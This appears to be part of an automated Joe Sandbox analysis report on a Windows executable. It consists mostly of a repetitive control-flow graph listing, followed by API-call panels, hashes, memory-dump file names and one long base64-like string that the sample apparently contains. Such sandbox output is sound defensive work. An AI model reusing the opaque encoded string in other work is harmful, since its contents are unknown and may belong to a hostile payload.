3480->3482 3481->3480 3483 7ff749f414ef 3482->3483 3484 7ff749f414f4 3483->3484 3485 7ff749f41394 2 API calls 3483->3485 3486 7ff749f41394 2 API calls 3484->3486 3485->3484 3487 7ff749f414fe 3486->3487 3488 7ff749f41394 2 API calls 3487->3488 3489 7ff749f41503 3488->3489 3490 7ff749f41394 2 API calls 3489->3490 3491 7ff749f41512 3490->3491 3492 7ff749f41394 2 API calls 3491->3492 3493 7ff749f41521 3492->3493 3494 7ff749f41530 3493->3494 3495 7ff749f41394 2 API calls 3493->3495 3496 7ff749f41394 2 API calls 3494->3496 3495->3494 3497 7ff749f4153a 3496->3497 3498 7ff749f4153f 3497->3498 3499 7ff749f41394 2 API calls 3497->3499 3500 7ff749f41394 2 API calls 3498->3500 3499->3498 3501 7ff749f4154e 3500->3501 3502 7ff749f41394 2 API calls 3501->3502 3503 7ff749f41558 3502->3503 3504 7ff749f4155d 3503->3504 3505 7ff749f41394 2 API calls 3503->3505 3506 7ff749f41394 2 API calls 3504->3506 3505->3504 3507 7ff749f41567 3506->3507 3508 7ff749f4156c 3507->3508 3509 7ff749f41394 2 API calls 3507->3509 3510 7ff749f41394 2 API calls 3508->3510 3509->3508 3511 7ff749f41576 3510->3511 3512 7ff749f4157b 3511->3512 3513 7ff749f41394 2 API calls 3511->3513 3514 7ff749f41394 2 API calls 3512->3514 3513->3512 3515 7ff749f41585 3514->3515 3516 7ff749f4158a 3515->3516 3517 7ff749f41394 2 API calls 3515->3517 3518 7ff749f41394 2 API calls 3516->3518 3517->3516 3519 7ff749f41599 3518->3519 3520 7ff749f41394 2 API calls 3519->3520 3521 7ff749f415a3 3520->3521 3522 7ff749f415a8 3521->3522 3523 7ff749f41394 2 API calls 3521->3523 3524 7ff749f41394 2 API calls 3522->3524 3523->3522 3525 7ff749f415b7 3524->3525 3526 7ff749f41394 2 API calls 3525->3526 3527 7ff749f415c1 3526->3527 3528 7ff749f415c6 3527->3528 3529 7ff749f41394 2 API calls 3527->3529 3530 7ff749f41394 2 API calls 3528->3530 3529->3528 3531 7ff749f415d0 3530->3531 3532 7ff749f415d5 3531->3532 3533 7ff749f41394 2 API calls 3531->3533 3534 7ff749f41394 2 API calls 3532->3534 3533->3532 3535 7ff749f415df 3534->3535 3536 7ff749f415e4 
3535->3536 3537 7ff749f41394 2 API calls 3535->3537 3538 7ff749f41394 2 API calls 3536->3538 3537->3536 3539 7ff749f415f3 3538->3539 3539->3131 4230 7ff749f42660 3540->4230 3545 7ff749f4145e 2 API calls 3546 7ff749f42f35 3545->3546 3547 7ff749f42f53 3546->3547 4265 7ff749f41512 3546->4265 3549 7ff749f4145e 2 API calls 3547->3549 3550 7ff749f42f5d 3549->3550 3550->3294 3551 7ff749f42e3c 4232 7ff749f42690 3551->4232 3553 7ff749f41394 2 API calls 3552->3553 3554 7ff749f414e0 3553->3554 3555 7ff749f414e5 3554->3555 3556 7ff749f41394 2 API calls 3554->3556 3557 7ff749f41394 2 API calls 3555->3557 3556->3555 3558 7ff749f414ef 3557->3558 3559 7ff749f414f4 3558->3559 3560 7ff749f41394 2 API calls 3558->3560 3561 7ff749f41394 2 API calls 3559->3561 3560->3559 3562 7ff749f414fe 3561->3562 3563 7ff749f41394 2 API calls 3562->3563 3564 7ff749f41503 3563->3564 3565 7ff749f41394 2 API calls 3564->3565 3566 7ff749f41512 3565->3566 3567 7ff749f41394 2 API calls 3566->3567 3568 7ff749f41521 3567->3568 3569 7ff749f41530 3568->3569 3570 7ff749f41394 2 API calls 3568->3570 3571 7ff749f41394 2 API calls 3569->3571 3570->3569 3572 7ff749f4153a 3571->3572 3573 7ff749f4153f 3572->3573 3574 7ff749f41394 2 API calls 3572->3574 3575 7ff749f41394 2 API calls 3573->3575 3574->3573 3576 7ff749f4154e 3575->3576 3577 7ff749f41394 2 API calls 3576->3577 3578 7ff749f41558 3577->3578 3579 7ff749f4155d 3578->3579 3580 7ff749f41394 2 API calls 3578->3580 3581 7ff749f41394 2 API calls 3579->3581 3580->3579 3582 7ff749f41567 3581->3582 3583 7ff749f4156c 3582->3583 3584 7ff749f41394 2 API calls 3582->3584 3585 7ff749f41394 2 API calls 3583->3585 3584->3583 3586 7ff749f41576 3585->3586 3587 7ff749f4157b 3586->3587 3588 7ff749f41394 2 API calls 3586->3588 3589 7ff749f41394 2 API calls 3587->3589 3588->3587 3590 7ff749f41585 3589->3590 3591 7ff749f4158a 3590->3591 3592 7ff749f41394 2 API calls 3590->3592 3593 7ff749f41394 2 API calls 3591->3593 3592->3591 3594 7ff749f41599 3593->3594 3595 7ff749f41394 2 API 
calls 3594->3595 3596 7ff749f415a3 3595->3596 3597 7ff749f415a8 3596->3597 3598 7ff749f41394 2 API calls 3596->3598 3599 7ff749f41394 2 API calls 3597->3599 3598->3597 3600 7ff749f415b7 3599->3600 3601 7ff749f41394 2 API calls 3600->3601 3602 7ff749f415c1 3601->3602 3603 7ff749f415c6 3602->3603 3604 7ff749f41394 2 API calls 3602->3604 3605 7ff749f41394 2 API calls 3603->3605 3604->3603 3606 7ff749f415d0 3605->3606 3607 7ff749f415d5 3606->3607 3608 7ff749f41394 2 API calls 3606->3608 3609 7ff749f41394 2 API calls 3607->3609 3608->3607 3610 7ff749f415df 3609->3610 3611 7ff749f415e4 3610->3611 3612 7ff749f41394 2 API calls 3610->3612 3613 7ff749f41394 2 API calls 3611->3613 3612->3611 3614 7ff749f415f3 3613->3614 3614->3156 3616 7ff749f41394 2 API calls 3615->3616 3617 7ff749f41477 3616->3617 3618 7ff749f4147c 3617->3618 3619 7ff749f41394 2 API calls 3617->3619 3620 7ff749f41394 2 API calls 3618->3620 3619->3618 3621 7ff749f41486 3620->3621 3622 7ff749f4148b 3621->3622 3623 7ff749f41394 2 API calls 3621->3623 3624 7ff749f41394 2 API calls 3622->3624 3623->3622 3625 7ff749f41495 3624->3625 3626 7ff749f4149a 3625->3626 3627 7ff749f41394 2 API calls 3625->3627 3628 7ff749f41394 2 API calls 3626->3628 3627->3626 3629 7ff749f414a4 3628->3629 3630 7ff749f414a9 3629->3630 3631 7ff749f41394 2 API calls 3629->3631 3632 7ff749f41394 2 API calls 3630->3632 3631->3630 3633 7ff749f414b3 3632->3633 3634 7ff749f414b8 3633->3634 3635 7ff749f41394 2 API calls 3633->3635 3636 7ff749f41394 2 API calls 3634->3636 3635->3634 3637 7ff749f414c2 3636->3637 3638 7ff749f414c7 3637->3638 3639 7ff749f41394 2 API calls 3637->3639 3640 7ff749f41394 2 API calls 3638->3640 3639->3638 3641 7ff749f414d1 3640->3641 3642 7ff749f414d6 3641->3642 3643 7ff749f41394 2 API calls 3641->3643 3644 7ff749f41394 2 API calls 3642->3644 3643->3642 3645 7ff749f414e0 3644->3645 3646 7ff749f414e5 3645->3646 3647 7ff749f41394 2 API calls 3645->3647 3648 7ff749f41394 2 API calls 3646->3648 3647->3646 3649 7ff749f414ef 
3648->3649 3650 7ff749f414f4 3649->3650 3651 7ff749f41394 2 API calls 3649->3651 3652 7ff749f41394 2 API calls 3650->3652 3651->3650 3653 7ff749f414fe 3652->3653 3654 7ff749f41394 2 API calls 3653->3654 3655 7ff749f41503 3654->3655 3656 7ff749f41394 2 API calls 3655->3656 3657 7ff749f41512 3656->3657 3658 7ff749f41394 2 API calls 3657->3658 3659 7ff749f41521 3658->3659 3660 7ff749f41530 3659->3660 3661 7ff749f41394 2 API calls 3659->3661 3662 7ff749f41394 2 API calls 3660->3662 3661->3660 3663 7ff749f4153a 3662->3663 3664 7ff749f4153f 3663->3664 3665 7ff749f41394 2 API calls 3663->3665 3666 7ff749f41394 2 API calls 3664->3666 3665->3664 3667 7ff749f4154e 3666->3667 3668 7ff749f41394 2 API calls 3667->3668 3669 7ff749f41558 3668->3669 3670 7ff749f4155d 3669->3670 3671 7ff749f41394 2 API calls 3669->3671 3672 7ff749f41394 2 API calls 3670->3672 3671->3670 3673 7ff749f41567 3672->3673 3674 7ff749f4156c 3673->3674 3675 7ff749f41394 2 API calls 3673->3675 3676 7ff749f41394 2 API calls 3674->3676 3675->3674 3677 7ff749f41576 3676->3677 3678 7ff749f4157b 3677->3678 3679 7ff749f41394 2 API calls 3677->3679 3680 7ff749f41394 2 API calls 3678->3680 3679->3678 3681 7ff749f41585 3680->3681 3682 7ff749f4158a 3681->3682 3683 7ff749f41394 2 API calls 3681->3683 3684 7ff749f41394 2 API calls 3682->3684 3683->3682 3685 7ff749f41599 3684->3685 3686 7ff749f41394 2 API calls 3685->3686 3687 7ff749f415a3 3686->3687 3688 7ff749f415a8 3687->3688 3689 7ff749f41394 2 API calls 3687->3689 3690 7ff749f41394 2 API calls 3688->3690 3689->3688 3691 7ff749f415b7 3690->3691 3692 7ff749f41394 2 API calls 3691->3692 3693 7ff749f415c1 3692->3693 3694 7ff749f415c6 3693->3694 3695 7ff749f41394 2 API calls 3693->3695 3696 7ff749f41394 2 API calls 3694->3696 3695->3694 3697 7ff749f415d0 3696->3697 3698 7ff749f415d5 3697->3698 3699 7ff749f41394 2 API calls 3697->3699 3700 7ff749f41394 2 API calls 3698->3700 3699->3698 3701 7ff749f415df 3700->3701 3702 7ff749f415e4 3701->3702 3703 7ff749f41394 2 API calls 
3701->3703 3704 7ff749f41394 2 API calls 3702->3704 3703->3702 3705 7ff749f415f3 3704->3705 3705->3176 3706 7ff749f41404 3705->3706 3707 7ff749f41394 2 API calls 3706->3707 3708 7ff749f41413 3707->3708 3709 7ff749f41422 3708->3709 3710 7ff749f41394 2 API calls 3708->3710 3711 7ff749f41394 2 API calls 3709->3711 3710->3709 3712 7ff749f4142c 3711->3712 3713 7ff749f41431 3712->3713 3714 7ff749f41394 2 API calls 3712->3714 3715 7ff749f41394 2 API calls 3713->3715 3714->3713 3716 7ff749f4143b 3715->3716 3717 7ff749f41440 3716->3717 3718 7ff749f41394 2 API calls 3716->3718 3719 7ff749f41394 2 API calls 3717->3719 3718->3717 3720 7ff749f4144f 3719->3720 3721 7ff749f41394 2 API calls 3720->3721 3722 7ff749f41459 3721->3722 3723 7ff749f4145e 3722->3723 3724 7ff749f41394 2 API calls 3722->3724 3725 7ff749f41394 2 API calls 3723->3725 3724->3723 3726 7ff749f41468 3725->3726 3727 7ff749f4146d 3726->3727 3728 7ff749f41394 2 API calls 3726->3728 3729 7ff749f41394 2 API calls 3727->3729 3728->3727 3730 7ff749f41477 3729->3730 3731 7ff749f4147c 3730->3731 3732 7ff749f41394 2 API calls 3730->3732 3733 7ff749f41394 2 API calls 3731->3733 3732->3731 3734 7ff749f41486 3733->3734 3735 7ff749f4148b 3734->3735 3736 7ff749f41394 2 API calls 3734->3736 3737 7ff749f41394 2 API calls 3735->3737 3736->3735 3738 7ff749f41495 3737->3738 3739 7ff749f4149a 3738->3739 3740 7ff749f41394 2 API calls 3738->3740 3741 7ff749f41394 2 API calls 3739->3741 3740->3739 3742 7ff749f414a4 3741->3742 3743 7ff749f414a9 3742->3743 3744 7ff749f41394 2 API calls 3742->3744 3745 7ff749f41394 2 API calls 3743->3745 3744->3743 3746 7ff749f414b3 3745->3746 3747 7ff749f414b8 3746->3747 3748 7ff749f41394 2 API calls 3746->3748 3749 7ff749f41394 2 API calls 3747->3749 3748->3747 3750 7ff749f414c2 3749->3750 3751 7ff749f414c7 3750->3751 3752 7ff749f41394 2 API calls 3750->3752 3753 7ff749f41394 2 API calls 3751->3753 3752->3751 3754 7ff749f414d1 3753->3754 3755 7ff749f414d6 3754->3755 3756 7ff749f41394 2 API calls 
3754->3756 3757 7ff749f41394 2 API calls 3755->3757 3756->3755 3758 7ff749f414e0 3757->3758 3759 7ff749f414e5 3758->3759 3760 7ff749f41394 2 API calls 3758->3760 3761 7ff749f41394 2 API calls 3759->3761 3760->3759 3762 7ff749f414ef 3761->3762 3763 7ff749f414f4 3762->3763 3764 7ff749f41394 2 API calls 3762->3764 3765 7ff749f41394 2 API calls 3763->3765 3764->3763 3766 7ff749f414fe 3765->3766 3767 7ff749f41394 2 API calls 3766->3767 3768 7ff749f41503 3767->3768 3769 7ff749f41394 2 API calls 3768->3769 3770 7ff749f41512 3769->3770 3771 7ff749f41394 2 API calls 3770->3771 3772 7ff749f41521 3771->3772 3773 7ff749f41530 3772->3773 3774 7ff749f41394 2 API calls 3772->3774 3775 7ff749f41394 2 API calls 3773->3775 3774->3773 3776 7ff749f4153a 3775->3776 3777 7ff749f4153f 3776->3777 3778 7ff749f41394 2 API calls 3776->3778 3779 7ff749f41394 2 API calls 3777->3779 3778->3777 3780 7ff749f4154e 3779->3780 3781 7ff749f41394 2 API calls 3780->3781 3782 7ff749f41558 3781->3782 3783 7ff749f4155d 3782->3783 3784 7ff749f41394 2 API calls 3782->3784 3785 7ff749f41394 2 API calls 3783->3785 3784->3783 3786 7ff749f41567 3785->3786 3787 7ff749f4156c 3786->3787 3788 7ff749f41394 2 API calls 3786->3788 3789 7ff749f41394 2 API calls 3787->3789 3788->3787 3790 7ff749f41576 3789->3790 3791 7ff749f4157b 3790->3791 3792 7ff749f41394 2 API calls 3790->3792 3793 7ff749f41394 2 API calls 3791->3793 3792->3791 3794 7ff749f41585 3793->3794 3795 7ff749f4158a 3794->3795 3796 7ff749f41394 2 API calls 3794->3796 3797 7ff749f41394 2 API calls 3795->3797 3796->3795 3798 7ff749f41599 3797->3798 3799 7ff749f41394 2 API calls 3798->3799 3800 7ff749f415a3 3799->3800 3801 7ff749f415a8 3800->3801 3802 7ff749f41394 2 API calls 3800->3802 3803 7ff749f41394 2 API calls 3801->3803 3802->3801 3804 7ff749f415b7 3803->3804 3805 7ff749f41394 2 API calls 3804->3805 3806 7ff749f415c1 3805->3806 3807 7ff749f415c6 3806->3807 3808 7ff749f41394 2 API calls 3806->3808 3809 7ff749f41394 2 API calls 3807->3809 3808->3807 3810 
7ff749f415d0 3809->3810 3811 7ff749f415d5 3810->3811 3812 7ff749f41394 2 API calls 3810->3812 3813 7ff749f41394 2 API calls 3811->3813 3812->3811 3814 7ff749f415df 3813->3814 3815 7ff749f415e4 3814->3815 3816 7ff749f41394 2 API calls 3814->3816 3817 7ff749f41394 2 API calls 3815->3817 3816->3815 3818 7ff749f415f3 3817->3818 3818->3180 3820 7ff749f41394 2 API calls 3819->3820 3821 7ff749f41585 3820->3821 3822 7ff749f4158a 3821->3822 3823 7ff749f41394 2 API calls 3821->3823 3824 7ff749f41394 2 API calls 3822->3824 3823->3822 3825 7ff749f41599 3824->3825 3826 7ff749f41394 2 API calls 3825->3826 3827 7ff749f415a3 3826->3827 3828 7ff749f415a8 3827->3828 3829 7ff749f41394 2 API calls 3827->3829 3830 7ff749f41394 2 API calls 3828->3830 3829->3828 3831 7ff749f415b7 3830->3831 3832 7ff749f41394 2 API calls 3831->3832 3833 7ff749f415c1 3832->3833 3834 7ff749f415c6 3833->3834 3835 7ff749f41394 2 API calls 3833->3835 3836 7ff749f41394 2 API calls 3834->3836 3835->3834 3837 7ff749f415d0 3836->3837 3838 7ff749f415d5 3837->3838 3839 7ff749f41394 2 API calls 3837->3839 3840 7ff749f41394 2 API calls 3838->3840 3839->3838 3841 7ff749f415df 3840->3841 3842 7ff749f415e4 3841->3842 3843 7ff749f41394 2 API calls 3841->3843 3844 7ff749f41394 2 API calls 3842->3844 3843->3842 3845 7ff749f415f3 3844->3845 3845->3188 3846 7ff749f4158a 3845->3846 3847 7ff749f41394 2 API calls 3846->3847 3848 7ff749f41599 3847->3848 3849 7ff749f41394 2 API calls 3848->3849 3850 7ff749f415a3 3849->3850 3851 7ff749f415a8 3850->3851 3852 7ff749f41394 2 API calls 3850->3852 3853 7ff749f41394 2 API calls 3851->3853 3852->3851 3854 7ff749f415b7 3853->3854 3855 7ff749f41394 2 API calls 3854->3855 3856 7ff749f415c1 3855->3856 3857 7ff749f415c6 3856->3857 3858 7ff749f41394 2 API calls 3856->3858 3859 7ff749f41394 2 API calls 3857->3859 3858->3857 3860 7ff749f415d0 3859->3860 3861 7ff749f415d5 3860->3861 3862 7ff749f41394 2 API calls 3860->3862 3863 7ff749f41394 2 API calls 3861->3863 3862->3861 3864 7ff749f415df 
3863->3864 3865 7ff749f415e4 3864->3865 3866 7ff749f41394 2 API calls 3864->3866 3867 7ff749f41394 2 API calls 3865->3867 3866->3865 3868 7ff749f415f3 3867->3868 3868->3188 3870 7ff749f41394 2 API calls 3869->3870 3871 7ff749f415f3 3870->3871 3871->3192 3873 7ff749f42f88 3872->3873 3874 7ff749f414a9 2 API calls 3873->3874 3875 7ff749f42fd0 3874->3875 3875->3202 3877 7ff749f42690 10 API calls 3876->3877 3878 7ff749f4392e 3877->3878 3879 7ff749f414a9 2 API calls 3878->3879 3898 7ff749f43b31 3878->3898 3881 7ff749f43977 3879->3881 3880 7ff749f43b38 4790 7ff749f415c6 3880->4790 3881->3880 4463 7ff749f414b8 3881->4463 3884 7ff749f43a97 memset 4541 7ff749f4148b 3884->4541 3887 7ff749f414b8 2 API calls 3888 7ff749f4399f 3887->3888 3888->3884 3888->3887 4534 7ff749f415d5 3888->4534 3892 7ff749f414b8 2 API calls 3893 7ff749f43b17 3892->3893 3893->3880 3894 7ff749f43b1b 3893->3894 4703 7ff749f4147c 3894->4703 3897 7ff749f4145e 2 API calls 3897->3898 3899 7ff749f414c7 3898->3899 3900 7ff749f41394 2 API calls 3899->3900 3901 7ff749f414d1 3900->3901 3902 7ff749f414d6 3901->3902 3903 7ff749f41394 2 API calls 3901->3903 3904 7ff749f41394 2 API calls 3902->3904 3903->3902 3905 7ff749f414e0 3904->3905 3906 7ff749f414e5 3905->3906 3907 7ff749f41394 2 API calls 3905->3907 3908 7ff749f41394 2 API calls 3906->3908 3907->3906 3909 7ff749f414ef 3908->3909 3910 7ff749f414f4 3909->3910 3911 7ff749f41394 2 API calls 3909->3911 3912 7ff749f41394 2 API calls 3910->3912 3911->3910 3913 7ff749f414fe 3912->3913 3914 7ff749f41394 2 API calls 3913->3914 3915 7ff749f41503 3914->3915 3916 7ff749f41394 2 API calls 3915->3916 3917 7ff749f41512 3916->3917 3918 7ff749f41394 2 API calls 3917->3918 3919 7ff749f41521 3918->3919 3920 7ff749f41530 3919->3920 3921 7ff749f41394 2 API calls 3919->3921 3922 7ff749f41394 2 API calls 3920->3922 3921->3920 3923 7ff749f4153a 3922->3923 3924 7ff749f4153f 3923->3924 3925 7ff749f41394 2 API calls 3923->3925 3926 7ff749f41394 2 API calls 3924->3926 3925->3924 3927 
7ff749f4154e 3926->3927 3928 7ff749f41394 2 API calls 3927->3928 3929 7ff749f41558 3928->3929 3930 7ff749f4155d 3929->3930 3931 7ff749f41394 2 API calls 3929->3931 3932 7ff749f41394 2 API calls 3930->3932 3931->3930 3933 7ff749f41567 3932->3933 3934 7ff749f4156c 3933->3934 3935 7ff749f41394 2 API calls 3933->3935 3936 7ff749f41394 2 API calls 3934->3936 3935->3934 3937 7ff749f41576 3936->3937 3938 7ff749f4157b 3937->3938 3939 7ff749f41394 2 API calls 3937->3939 3940 7ff749f41394 2 API calls 3938->3940 3939->3938 3941 7ff749f41585 3940->3941 3942 7ff749f4158a 3941->3942 3943 7ff749f41394 2 API calls 3941->3943 3944 7ff749f41394 2 API calls 3942->3944 3943->3942 3945 7ff749f41599 3944->3945 3946 7ff749f41394 2 API calls 3945->3946 3947 7ff749f415a3 3946->3947 3948 7ff749f415a8 3947->3948 3949 7ff749f41394 2 API calls 3947->3949 3950 7ff749f41394 2 API calls 3948->3950 3949->3948 3951 7ff749f415b7 3950->3951 3952 7ff749f41394 2 API calls 3951->3952 3953 7ff749f415c1 3952->3953 3954 7ff749f415c6 3953->3954 3955 7ff749f41394 2 API calls 3953->3955 3956 7ff749f41394 2 API calls 3954->3956 3955->3954 3957 7ff749f415d0 3956->3957 3958 7ff749f415d5 3957->3958 3959 7ff749f41394 2 API calls 3957->3959 3960 7ff749f41394 2 API calls 3958->3960 3959->3958 3961 7ff749f415df 3960->3961 3962 7ff749f415e4 3961->3962 3963 7ff749f41394 2 API calls 3961->3963 3964 7ff749f41394 2 API calls 3962->3964 3963->3962 3965 7ff749f415f3 3964->3965 3965->3207 3965->3208 3967 7ff749f41394 2 API calls 3966->3967 3968 7ff749f415b7 3967->3968 3969 7ff749f41394 2 API calls 3968->3969 3970 7ff749f415c1 3969->3970 3971 7ff749f415c6 3970->3971 3972 7ff749f41394 2 API calls 3970->3972 3973 7ff749f41394 2 API calls 3971->3973 3972->3971 3974 7ff749f415d0 3973->3974 3975 7ff749f415d5 3974->3975 3976 7ff749f41394 2 API calls 3974->3976 3977 7ff749f41394 2 API calls 3975->3977 3976->3975 3978 7ff749f415df 3977->3978 3979 7ff749f415e4 3978->3979 3980 7ff749f41394 2 API calls 3978->3980 3981 7ff749f41394 2 API 
calls 3979->3981 3980->3979 3982 7ff749f415f3 3981->3982 3982->3221 3982->3222 3984 7ff749f41394 2 API calls 3983->3984 3985 7ff749f4153a 3984->3985 3986 7ff749f4153f 3985->3986 3987 7ff749f41394 2 API calls 3985->3987 3988 7ff749f41394 2 API calls 3986->3988 3987->3986 3989 7ff749f4154e 3988->3989 3990 7ff749f41394 2 API calls 3989->3990 3991 7ff749f41558 3990->3991 3992 7ff749f4155d 3991->3992 3993 7ff749f41394 2 API calls 3991->3993 3994 7ff749f41394 2 API calls 3992->3994 3993->3992 3995 7ff749f41567 3994->3995 3996 7ff749f4156c 3995->3996 3997 7ff749f41394 2 API calls 3995->3997 3998 7ff749f41394 2 API calls 3996->3998 3997->3996 3999 7ff749f41576 3998->3999 4000 7ff749f4157b 3999->4000 4001 7ff749f41394 2 API calls 3999->4001 4002 7ff749f41394 2 API calls 4000->4002 4001->4000 4003 7ff749f41585 4002->4003 4004 7ff749f4158a 4003->4004 4005 7ff749f41394 2 API calls 4003->4005 4006 7ff749f41394 2 API calls 4004->4006 4005->4004 4007 7ff749f41599 4006->4007 4008 7ff749f41394 2 API calls 4007->4008 4009 7ff749f415a3 4008->4009 4010 7ff749f415a8 4009->4010 4011 7ff749f41394 2 API calls 4009->4011 4012 7ff749f41394 2 API calls 4010->4012 4011->4010 4013 7ff749f415b7 4012->4013 4014 7ff749f41394 2 API calls 4013->4014 4015 7ff749f415c1 4014->4015 4016 7ff749f415c6 4015->4016 4017 7ff749f41394 2 API calls 4015->4017 4018 7ff749f41394 2 API calls 4016->4018 4017->4016 4019 7ff749f415d0 4018->4019 4020 7ff749f415d5 4019->4020 4021 7ff749f41394 2 API calls 4019->4021 4022 7ff749f41394 2 API calls 4020->4022 4021->4020 4023 7ff749f415df 4022->4023 4024 7ff749f415e4 4023->4024 4025 7ff749f41394 2 API calls 4023->4025 4026 7ff749f41394 2 API calls 4024->4026 4025->4024 4027 7ff749f415f3 4026->4027 4027->3245 4027->3246 4029 7ff749f41394 2 API calls 4028->4029 4030 7ff749f414b3 4029->4030 4031 7ff749f414b8 4030->4031 4032 7ff749f41394 2 API calls 4030->4032 4033 7ff749f41394 2 API calls 4031->4033 4032->4031 4034 7ff749f414c2 4033->4034 4035 7ff749f414c7 4034->4035 4036 

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 2643109117-0
                                                                                • Opcode ID: fbf89af212a9236fbcd89e8a13abc7f817758a3af0e927eba919c5f762fd2f1d
                                                                                • Instruction ID: fe3c8a29ac9a653aebd1f9f7110b811fba32ba84110e283ec0fdda04b0ccecbd
                                                                                • Opcode Fuzzy Hash: fbf89af212a9236fbcd89e8a13abc7f817758a3af0e927eba919c5f762fd2f1d
                                                                                • Instruction Fuzzy Hash: AA512831B8D696C1F710FF29E950B79A7B5AFA4B80FC05031DA0D877E2DE2CA4918720

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtTerminateProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF749F41156), ref: 00007FF749F413F7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: ProcessTerminate
                                                                                • String ID:
                                                                                • API String ID: 560597551-0
                                                                                • Opcode ID: 4b288eef67ca88178435c23d0b43268a82fd7f4891f0d5863e4ef906ca526c5f
                                                                                • Instruction ID: bf1d96b365fc8e541252a8b72505a172072ffff6911326fb091291ea3ce489eb
                                                                                • Opcode Fuzzy Hash: 4b288eef67ca88178435c23d0b43268a82fd7f4891f0d5863e4ef906ca526c5f
                                                                                • Instruction Fuzzy Hash: F4F0A47195CB41CAD714FF5AB84082AA770FBA8782B804439EA9C4266ADF3CE1508B60
                                                                                APIs
                                                                                Strings
                                                                                • OiPpem9wdXluZnhyk5pkdsx1dnhmZHJuNmRhdWNmbm93eXl6bHB1eWpmeHJsZWR2dHV2eGZkcm52ZGF1s2ZubwQLw3RsxHy0S955PqFEMB4dBlYIFAsVHBcJQRYCCAAAA1kbH0wCABdKDxZSKCo3VhkaEh1IaX9kUmRhdWNmbm882dHnY7Gzt2WnvrxjpKK4MMy2t2iltKAy3aa6Y6eooXi4vrQDsbO3Uye2vWSkorhNNE+2aKW0oE8lpbptp6ihJRAa, xrefs: 00007FF749F45124
                                                                                • , xrefs: 00007FF749F45753
                                                                                • X&, xrefs: 00007FF749F462CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen$memset$wcscat$wcscpy$_wcsnicmp$memcpy$_wcsicmp
                                                                                • String ID: $OiPpem9wdXluZnhyk5pkdsx1dnhmZHJuNmRhdWNmbm93eXl6bHB1eWpmeHJsZWR2dHV2eGZkcm52ZGF1s2ZubwQLw3RsxHy0S955PqFEMB4dBlYIFAsVHBcJQRYCCAAAA1kbH0wCABdKDxZSKCo3VhkaEh1IaX9kUmRhdWNmbm882dHnY7Gzt2WnvrxjpKK4MMy2t2iltKAy3aa6Y6eooXi4vrQDsbO3Uye2vWSkorhNNE+2aKW0oE8lpbptp6ihJRAa$X&
                                                                                • API String ID: 3604702941-1492181059
                                                                                • Opcode ID: 7f0efb7b49730ebeb84e69c2c52a15baaeeebae0b5016ad7693f10e129db55ae
                                                                                • Instruction ID: 019ef6760616db660c28e65dce5b3daf24a20159c9b6287bfa24360c12a29307
                                                                                • Opcode Fuzzy Hash: 7f0efb7b49730ebeb84e69c2c52a15baaeeebae0b5016ad7693f10e129db55ae
                                                                                • Instruction Fuzzy Hash: 6F537A61D2CAC3C4F711BF28B8016F4E770AFA5388FD45271EA8C565A2EF6C6284D764

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmp
